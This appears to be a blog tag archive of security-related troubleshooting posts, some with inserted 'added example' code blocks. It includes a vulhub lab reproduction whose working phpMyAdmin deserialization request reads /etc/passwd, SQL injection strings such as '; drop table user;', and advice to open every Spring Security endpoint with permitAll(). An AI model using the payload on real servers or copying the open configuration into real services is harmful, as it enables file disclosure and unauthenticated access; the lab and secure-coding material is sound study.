Tag Archives: security

[Solved] ClientError.Security.Unauthorized: The client is unauthorized due to authentication failure.

Neo.ClientError.Security.Unauthorized: The client is unauthorized due to authentication failure.

Authentication against the Neo4j Community Edition failed. The solution:

Stop the service, find the auth file under data/dbms in the installation directory and delete it (my installation package was downloaded from a website, so the previous owner may have set a password; after the file is deleted the default password is neo4j again). Then just start the service.

In addition, the Community Edition version cannot be too high: it has to match your own Java version. My Java version is 1.8, so the Community Edition needs to be version 4.

[Solved] spring boot security Start Error: ‘login.html?error‘ is not a valid redirect URL

Configure the custom login page:

http.formLogin().loginPage("login.html")   // custom login page: this line causes the error, the path must start with a slash
                .loginProcessingUrl("/login")   // the action of the login form, i.e. the path of the authentication request
                .usernameParameter("username")
                .passwordParameter("password")
                .defaultSuccessUrl("/home");   // default target path after a successful login

Change it to:

http.formLogin().loginPage("/login.html")
                .loginProcessingUrl("/login")
                .usernameParameter("username")
                .passwordParameter("password")
                .defaultSuccessUrl("/home");
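The reason the message names 'login.html?error' is that Spring Security derives the default failure URL from the login page by appending "?error"; a login page without a leading slash therefore yields a relative failure URL, which the redirect-URL check rejects. The class below is an added example, not the post's own code, showing the corrected form-login configuration as a complete class together with the rule a practitioner usually hits next: the login page (and any static assets it needs; the /css/** and /js/** patterns are assumed here) must be permitted to anonymous users, otherwise every unauthenticated request redirects to a page that itself redirects, and the browser reports a loop.

```java
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

// Added example (not from the original post): corrected form-login configuration.
// Paths /login.html, /login and /home are the ones used in the post; the static
// asset patterns /css/** and /js/** are assumptions.
@Configuration
@EnableWebSecurity
public class LoginPageSecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http
            .authorizeRequests()
                // The custom login page and its assets must be reachable without a
                // session, otherwise the redirect to /login.html redirects again.
                .antMatchers("/login.html", "/css/**", "/js/**").permitAll()
                .anyRequest().authenticated()
                .and()
            .formLogin()
                .loginPage("/login.html")          // leading slash: an absolute path, not a relative URL
                .loginProcessingUrl("/login")      // form action; handled by Spring Security's filter
                .usernameParameter("username")
                .passwordParameter("password")
                .defaultSuccessUrl("/home", true)
                .failureUrl("/login.html?error")   // explicit; this is the value Spring derived as "login.html?error"
                .permitAll()                       // also permits the login page and failure URL
                .and()
            .logout()
                .logoutSuccessUrl("/login.html")
                .permitAll();
    }
}
```

Setting failureUrl explicitly is optional once loginPage starts with a slash, but spelling it out makes the value that appeared in the error message visible in the configuration.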

Pikachu vulnerability practice range: error when connecting to the MySQL database during installation

When installing the Pikachu vulnerability practice range (靶场), errors connecting to the MySQL database are handled as follows:

1. Confirm that the database can be reached normally; try connecting with a client tool. If it cannot, check configuration problems such as the service, user name and password first.
2. Change the database IP address, user name and password in config.inc.php to those of your database. Both the root directory and pkxss have this file, and both need to be modified.

The config.inc.php at pkxss\inc\config.inc.php under the root directory also needs to be modified. This one is easy to miss.

[Solved] java.lang.reflect.InaccessibleObjectException: Unable to make protected java.net.http.HttpRequest()…

Error message (back end):

java.lang.reflect.InaccessibleObjectException: Unable to make protected java.net.http.HttpRequest() accessible: module java.net.http does not "opens java.net.http" to unnamed module @621f89b8

Solution:

Change the type of the parameter passed into the controller method from HttpRequest (java.net.http) to HttpServletRequest. The wrong import was picked up: java.net.http.HttpRequest is the JDK HTTP client's request type, which Spring tries to instantiate reflectively through its protected constructor (and the module is not opened, hence the exception), whereas HttpServletRequest is the servlet request that Spring injects directly.

CompilationFailureException: Compilation failure error: cannot access NotThreadSafe

Error content:

Caused by: org.apache.maven.plugin.compiler.CompilationFailureException: Compilation failure
error: cannot access NotThreadSafe

Cause of the error:

            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpclient</artifactId>
                <version>4.5.2</version>
            </dependency>
            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpcore</artifactId>
                <version>4.4.5</version>
            </dependency>

The versions of the httpclient and httpcore packages do not match.

Be careful! Many online posts say that lowering httpcore to 4.4.4 solves the problem, because 4.5.2 and 4.4.4 match.

However, the httpclient 4.5.2 package itself has security vulnerabilities and is vulnerable to XSS attacks.

For the httpclient problem, see: https://github.com/advisories/GHSA-7r82-7xv7-xcpj
Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.

Therefore, upgrade httpclient to 4.5.13 instead, which matches httpcore 4.4.5 and satisfies both constraints.

Correct dependency declaration:

            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpclient</artifactId>
                <version>4.5.13</version>
            </dependency>
            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpcore</artifactId>
                <version>4.4.5</version>
            </dependency>

Several problems caused by device encryption

Description: ORA-12541: TNS:no listener + the Huorong (火绒) security software icon turns black

Problem description:

After Oracle is uninstalled and reinstalled, ORA-12541: TNS:no listener no longer appears for the time being, but after the computer is restarted the problem comes back. Solving it from the Oracle side works, but the problem reappears a few days later (the error above occurs when opening PL/SQL Developer).

At the same time, the Huorong icon turns black, or the Huorong installer pops up a message saying it cannot be installed in an encrypted directory (the prompt appears when Huorong is installed on a disk other than drive C).

At this point, the problem is most likely caused by device encryption.

Solution:

Turn off the device encryption setting.

Process (simple, just two steps):

1. Press Win + Q and type "device encryption" (the Windows key carries the Windows logo and is usually located near Fn in the lower left corner of the keyboard).

2. Select turn off (it takes some time).

I was puzzled by this problem for a while. During that period I solved it with methods found online; I even uninstalled Oracle and reinstalled it. It was solved at the time, but the problem kept coming back later, which was quite annoying.

Later I found the real cause. The problem is quite unusual and so is the solution, so I am sharing it with anyone who runs into a similar problem. I hope it helps.

FeignException$Unauthorized is reported after introducing Spring Security into the called service

Originally I was happily studying Spring Cloud. Later Spring Security was introduced for security, and then various problems appeared. First the service could not be registered (solution: see "after introducing security, the service could not be registered with Eureka"), and then the service could not be called.

The error log is as follows:

feign.FeignException$Unauthorized: [401] during [GET] to [ http://eureka-client/client/test ] [ClientService#getClientService()]: [{“timestamp”:”2021-07-08T09:01:18.940+00:00″,”status”:401,”error”:”Unauthorized”,”message”:””,”path”:”/client/test”}]

The error is easy to understand once you read it: the call has not been authenticated. This authentication is built into Spring Security. There are various methods online, but they are messy and many of them do not work, so here it is recommended to turn off Spring Security's built-in authentication for these calls (and add logic on the calling side to ensure security).

Add a configuration class to the called service:

@Configuration
@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity httpSecurity) throws Exception {
        httpSecurity.authorizeRequests().anyRequest().permitAll().and().logout().permitAll();
    }

    @Autowired
    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
        auth.userDetailsService(userDetailsService());
    }

}

Depending on the version, you sometimes also need to add an extra annotation to the startup class:

@SpringBootApplication(exclude = {org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration.class})

Tested and working.
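permitAll() makes the 401 go away by exposing every endpoint of eureka-client to anyone who can reach it. The post's own advice is to put security logic on the calling side instead; the following added example (not the post's code) shows one concrete way to do that while keeping Spring Security's authentication switched on: the called service accepts HTTP Basic for a service role, and the Feign client attaches those credentials to every request with Feign's BasicAuthRequestInterceptor. The user name svc-caller, the password and the /client/** path pattern are assumptions; the two @Configuration classes belong to two different applications (the called service and the caller) and are shown together only for reading.

```java
import feign.auth.BasicAuthRequestInterceptor;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;

// ---- Called service (eureka-client): authentication stays on, HTTP Basic is accepted ----
// Added example, not from the original post. Service account and paths are assumptions.
@Configuration
@EnableWebSecurity
public class ServiceSecurityConfig extends WebSecurityConfigurerAdapter {

    @Bean
    public PasswordEncoder passwordEncoder() {
        return new BCryptPasswordEncoder();
    }

    @Override
    protected void configure(AuthenticationManagerBuilder auth) throws Exception {
        // Hypothetical service account. In a real deployment the secret comes from
        // configuration or a secret store; it is hard-coded here only to keep the
        // example self-contained.
        auth.inMemoryAuthentication()
            .withUser("svc-caller")
            .password(passwordEncoder().encode("change-me"))
            .roles("SERVICE");
    }

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http
            .csrf().disable()                 // service-to-service calls carry no browser session
            .authorizeRequests()
                .antMatchers("/client/**").hasRole("SERVICE")   // the endpoint Feign calls
                .anyRequest().authenticated()
                .and()
            .httpBasic();                     // 401 with WWW-Authenticate instead of a login redirect
    }
}

// ---- Calling service: Feign adds "Authorization: Basic ..." to every request ----
// Lives in the caller's project; package-private here only so both parts fit in one file.
@Configuration
class FeignAuthConfig {

    @Bean
    public BasicAuthRequestInterceptor basicAuthRequestInterceptor() {
        // Must match the account configured on the called service.
        return new BasicAuthRequestInterceptor("svc-caller", "change-me");
    }
}
```

With this in place the GET to http://eureka-client/client/test carries credentials, so the 401 in the log disappears without opening the endpoint to unauthenticated callers; an unauthenticated request still receives 401, which is the behaviour a defender wants to keep.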
 

[vulnerability recurrence] phpMyAdmin scripts/setup.php deserialization vulnerability (wooyun-2016-199433)

0x01 vulnerability background

There is a deserialization vulnerability in phpMyAdmin 2.x, through which an attacker can read arbitrary files or execute arbitrary code.

0x02 vulnerability environment

Build the docker environment from vulhub.

Execute the following command in /home/vulhub/phpMyAdmin/wooyun-2016-199433 to start phpMyAdmin:

docker-compose up -d

The exposed port is 8080.

After the environment has started, visit http://ip:8080 and you can see the phpMyAdmin home page. Because no database is connected, an error is reported at this point, but exploiting this vulnerability has nothing to do with the database, so it can be ignored.

0x03 vulnerability recurrence

Capture the request with Burp Suite (BP).

Send the following request to read /etc/passwd:

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

You can view the contents of the/etc/passwd file.

Chrome Error: Uncaught Error: SECURITY_ERR: DOM Exception 18

Uncaught Error: SECURITY_ERR: DOM Exception 18

Question:
I get the following error in Chrome’s developer tools window when I try to set a cookie using this jQuery plugin:

Uncaught Error: SECURITY_ERR: DOM Exception 18

What does this error mean and how can I fix it? I get the same error when I use this jQuery plugin.

Answer:
You’re most likely using this on a local file over the file:// URI scheme, which cannot have cookies set. Put it on a local server so you can use http://localhost.

Can MyBatis prevent SQL injection?

1. Concept: what is SQL injection

SQL injection is a code injection technique used to attack data-driven applications: malicious SQL statements are inserted into fields that end up being executed.

It is a common attack. If an attacker enters special SQL fragments (such as "or 1 = 1") into form fields or the URL of an interface, it is possible to break into an application whose parameter validation is incomplete. Therefore some work has to be done during application development to prevent SQL injection. In applications with high security requirements (such as banking software), SQL statements are usually replaced by stored procedures to prevent SQL injection, which is a very safe way to handle it.

Answer: MyBatis can prevent SQL injection; please read on.

2. Implementation: how MyBatis prevents SQL injection

<!-- Safe: #{} binds the values as PreparedStatement parameters -->
<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
    select id, username, password, role
    from user
    where username = #{username,jdbcType=VARCHAR}
    and password = #{password,jdbcType=VARCHAR}
</select>

<!-- Unsafe: ${} splices the raw values into the SQL text -->
<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
    select id, username, password, role
    from user
    where username = ${username,jdbcType=VARCHAR}
    and password = ${password,jdbcType=VARCHAR}
</select>

The difference between # and $ in MyBatis:

1. # treats every incoming parameter as a string and automatically wraps it in double quotation marks.

For example: where username = #{username}. If the value passed in is 111, the SQL is parsed as where username = "111"; if the value passed in is id, the SQL is parsed as where username = "id".

2. $ places the incoming data directly into the generated SQL.

For example: where username = ${username}. If the value passed in is 111, the SQL is parsed as where username = 111.

If the value passed in is ; drop table user;, the parsed SQL is: select id, username, password, role from user where username = ; drop table user;

3. The # form prevents SQL injection to a great extent, while the $ form cannot prevent SQL injection.

4. The $ form is generally used to pass in database objects, such as table names.

5. It is recommended to use # and to avoid $. If you have to use parameters of the form "${XXX}", you must filter them carefully to prevent SQL injection attacks.

6. In MyBatis, parameters in the "${XXX}" format take part directly in SQL compilation, so injection cannot be avoided there. But for dynamic table names and column names only the "${XXX}" format can be used. Therefore such parameters must be handled manually in the code to prevent injection.

[Conclusion] Use the "#{XXX}" format as much as possible when writing MyBatis mapping statements. If you have to use parameters of the form "${XXX}", filter them manually to prevent SQL injection attacks.

3. Principle analysis: how does MyBatis prevent SQL injection?

The MyBatis framework is a semi-automatic persistence layer framework: SQL statements are written by hand by developers, so SQL injection must be prevented at this point. In fact, a MyBatis SQL statement has an "input + output" structure, similar to a function. Refer to the two examples above: parameterType indicates the input parameter type and resultMap (or resultType) indicates the output type. Thinking back, if you want to prevent SQL injection, you have to do something about the input parameters. In the code above, #{} marks the place where an input parameter is spliced into the SQL. After the parameters are passed in, the SQL statement actually executed is printed as follows:

select id, username, password, role from user where username=? and password=?

That is, no matter what parameters you enter, the printed SQL looks like the above. Reason: MyBatis enables precompilation. Before execution, the SQL is sent to the database to be compiled; at execution time the compiled SQL is used directly and the parameters only replace the "?" placeholders. Because SQL injection can only act on the compilation step, this approach avoids SQL injection attacks.

[Underlying implementation] How does MyBatis precompile SQL? At the bottom of the framework it is the PreparedStatement class in JDBC that does the work. PreparedStatement extends the Statement interface we are all familiar with, and its objects contain a compiled SQL statement. This "prepared" approach not only improves security but also improves efficiency when the same SQL is executed many times, because the SQL has already been compiled and does not need to be compiled again.

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Safe, pre-compiled: the SQL text is fixed and the value is bound to the "?" placeholder
private String getNameByUserIdSafe(String userId) throws SQLException {
    Connection conn = getConn(); // get the connection
    String sql = "select id, username, password, role from user where id=?"; // compiled before the value is supplied
    PreparedStatement pstmt = conn.prepareStatement(sql);
    pstmt.setString(1, userId); // bound as data, never parsed as SQL
    ResultSet rs = pstmt.executeQuery(); // a SELECT returns a ResultSet: executeQuery, not executeUpdate
    ......
}

// Unsafe, not pre-compiled: the user-supplied value is concatenated into the SQL text,
// so the attacker's text is already part of the statement when it is compiled
private String getNameByUserIdUnsafe(String userId) throws SQLException {
    Connection conn = getConn(); // get the connection
    String sql = "select id,username,password,role from user where id=" + userId;
    // When userId is "3;drop table user;", the executed SQL statement becomes:
    // select id,username,password,role from user where id=3;drop table user;
    PreparedStatement pstmt = conn.prepareStatement(sql); // PreparedStatement cannot help here: the injection happened before compilation
    ResultSet rs = pstmt.executeQuery();
    ......
}

Conclusion

#{}: equivalent to PreparedStatement in JDBC

${}: the variable's value is output directly into the SQL text

In short: #{} goes through precompilation, which is safe; ${} only substitutes the variable's value without precompilation, which is not safe, and carries the risk of SQL injection.

If ${} is used after an order by clause, there is a risk of SQL injection when nothing is done about it. Parameter validation has to be developed at the code level: filter the parameter, check its length, check whether it belongs to the expected set, and check whether it contains special characters or database keywords.
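Points 4 and 6 above and the order by remark describe the one place where ${} cannot be avoided, a dynamic column or table name, and say it must be validated by hand. The following is an added example (not the post's code, and not MyBatis's own API beyond the @Select and @Param annotations) of what that validation looks like in practice: values go through #{} and are bound as placeholders, while the sort column and direction go through ${} only after being matched against a closed allow-list of identifiers. The mapper method, the user table columns and the UserQueryService class are assumptions.

```java
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;

import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;

// Added example (not from the original post). username is a value and uses #{};
// sortColumn and direction are identifiers, must use ${}, and are therefore
// allow-listed before they reach the mapper.
interface UserMapper {

    // username: bound as a '?' placeholder, safe for any input.
    // sortColumn/direction: spliced into the SQL text; MUST be validated first.
    @Select("select id, username, password, role from user "
          + "where username = #{username} "
          + "order by ${sortColumn} ${direction}")
    List<Map<String, Object>> findByUsernameSorted(@Param("username") String username,
                                                   @Param("sortColumn") String sortColumn,
                                                   @Param("direction") String direction);
}

final class UserQueryService {

    // Closed set of identifiers a caller may sort by: the only strings that are
    // ever allowed to be interpolated with ${}. Java 8 style, no Set.of.
    private static final Set<String> SORTABLE_COLUMNS = Collections.unmodifiableSet(
            new HashSet<>(Arrays.asList("id", "username", "role")));
    private static final Set<String> DIRECTIONS = Collections.unmodifiableSet(
            new HashSet<>(Arrays.asList("asc", "desc")));

    private final UserMapper mapper;

    UserQueryService(UserMapper mapper) {
        this.mapper = mapper;
    }

    /** Exact membership test; anything else is refused rather than "cleaned up". */
    static String checkedSortColumn(String requested) {
        if (requested == null || !SORTABLE_COLUMNS.contains(requested)) {
            // Fail closed: stripping characters from "id; drop table user" would
            // still leave SQL text, so the only safe answer is to reject it.
            throw new IllegalArgumentException("unsupported sort column: " + requested);
        }
        return requested;
    }

    static String checkedDirection(String requested) {
        String d = requested == null ? "asc" : requested.toLowerCase();
        if (!DIRECTIONS.contains(d)) {
            throw new IllegalArgumentException("unsupported sort direction: " + requested);
        }
        return d;
    }

    List<Map<String, Object>> search(String username, String sortColumn, String direction) {
        // A username of "x; drop table user" is harmless: it is bound as a string value.
        // A sortColumn of "id; drop table user" never reaches SQL: checkedSortColumn throws.
        return mapper.findByUsernameSorted(username,
                                           checkedSortColumn(sortColumn),
                                           checkedDirection(direction));
    }
}
```

The check is a membership test against known identifiers, not a blacklist of keywords or special characters: a blacklist has to anticipate every encoding and dialect trick, whereas an allow-list of the three column names the application actually sorts by cannot be bypassed by anything that is not one of those three strings.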

Push failed: Unable to access ‘https://github.com/‘: Failed to connect to github.com port 443: Timed out

Error when pushing to a remote GitHub repository:

Push failed Unable to access ‘https://github.com/‘: Failed to connect to github.com port 443: Timed out

Solution:

Find the stored GitHub login credential in the Credential Manager of the Control Panel and update the account password.

You can also open it quickly from a CMD window by entering: rundll32.exe keymgr.dll,KRShowKeyMgr